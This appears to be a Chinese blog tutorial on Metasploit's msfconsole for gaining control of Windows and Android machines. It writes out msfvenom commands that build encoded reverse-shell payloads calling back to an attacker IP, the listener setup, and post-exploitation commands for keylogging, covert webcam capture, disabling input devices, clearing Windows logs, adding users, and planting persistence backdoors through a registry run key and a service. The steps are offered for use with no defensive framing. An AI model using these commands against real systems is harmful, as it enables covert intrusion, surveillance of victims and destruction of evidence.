美文网首页
1.1Matesploit的msfconsole模式的简单使用

1.1Matesploit的msfconsole模式的简单使用

作者: 长江悠悠向东流 | 来源:发表于2019-06-28 21:21 被阅读0次

    目的:使用matesploit模块获得win7权限

    系统:Kali,攻击机:Kali,被攻击电脑:Win7/Win10
    1,生成远控文件
    Win系列:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f exe -o /root/Desktop/virus.exe -e x86/shikata_ga_nai -i 8
    lhost:攻击者ip
    lport:攻击者port
    

    Android:

    msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 R > /root/a.apk
    

    2,Kali执行msfconsole开始监听程序(Root模式下)

    msfconsole
    
    image.png

    使用handler模块

    use exploit/multi/handler
    
    image.png

    设置攻击负载

    set payload windows/meterpreter/reverse_tcp
    
    image.png

    设置本地监听ip和端口

    set LHOST 127.0.0.1
    
    set LPORT 4444
    
    image.png

    最后,将生成的.exe/.apk文件在windows/android上运行
    在Kali上运行 run/exploit


    image.png

    成功得到权限



    输入shell,进入windows cmd模式
    image.png
    其他常用命令:
    uictl开关键盘/鼠标
    uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
    uictl disable mouse  #禁用鼠标
    uictl disable keyboard  #禁用键盘
    
    网络摄像头摄像头命令
    webcam_list  #查看摄像头
    webcam_snap   #通过摄像头拍照
    webcam_stream   #通过摄像头开启视频
    
    执行执行文件
    execute #在目标机中执行文件
    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
    
    迁移进程迁移
    getpid    # 获取当前进程的pid
    ps   # 查看当前活跃进程
    migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
    kill <pid值>   #杀死进程
    
    清除日志
    clearav  #清除windows中的应用程序日志、系统日志、安全日志
    
    getsystem提权
    getsystem
    
    远程桌面及截屏
    enumdesktops  #查看可用的桌面
    getdesktop    #获取当前meterpreter 关联的桌面
    set_desktop   #设置meterpreter关联的桌面  -h查看帮助
    screenshot  #截屏
    use espia  #或者使用espia模块截屏  然后输入screengrab
    run vnc  #使用vnc远程桌面连接
    
    getgui命令
    run getgui –h #查看帮助
    run getgui -e #开启远程桌面
    run getgui -u lltest2 -p 123456   #添加用户
    run getgui -f 6661 –e   #3389端口转发到6661
    
    键盘记录
    keyscan_start  #开始键盘记录
    keyscan_dump   #导出记录数据
    keyscan_stop #结束键盘记录
    

    后门植入

    Metasploit的自带的后门有两种方式启动的,一种是通过启动项启动(持久性),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。

    1)持久性启动项后门

    在C:\用户*** \应用程序数据\本地的\ Temp \目录下,上传一个VBS脚本
    在注册表A. HKLM \软件\微软\的Windows \ CurrentVersion \运行\加入开机启动项

    run persistence –h  #查看帮助
    run persistence -X -i 5 -p 6661 -r 192.168.159.134
    #-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
    

    image
    image

    连接后门

    msf > use exploit/multi/handler
    msf > set payload windows/meterpreter/reverse_tcp
    msf > set LHOST 192.168.159.134
    msf > set LPORT 6661
    msf > exploit
    

    image

    2)metsvc服务后门

    在C:\用户*** \应用程序数据\本地\ TEMP \上传了三个文件(metsrv.x86.dll,metsvc-SERVER.EXE,metsvc.exe),通过服务启动,服务名为Meterpreter就会

    run metsvc –h   # 查看帮助
    run metsvc –A   #自动安装后门
    

    image
    image

    连接后门

    msf > use exploit/multi/handler
    msf > set payload windows/metsvc_bind_tcp
    msf > set RHOST 192.168.159.144
    msf > set LPORT 31337
    msf > exploit
    

    image

    然后,开始你的冒险之旅吧!

    相关文章

      网友评论

          本文标题:1.1Matesploit的msfconsole模式的简单使用

          本文链接:https://www.haomeiwen.com/subject/zvhycctx.html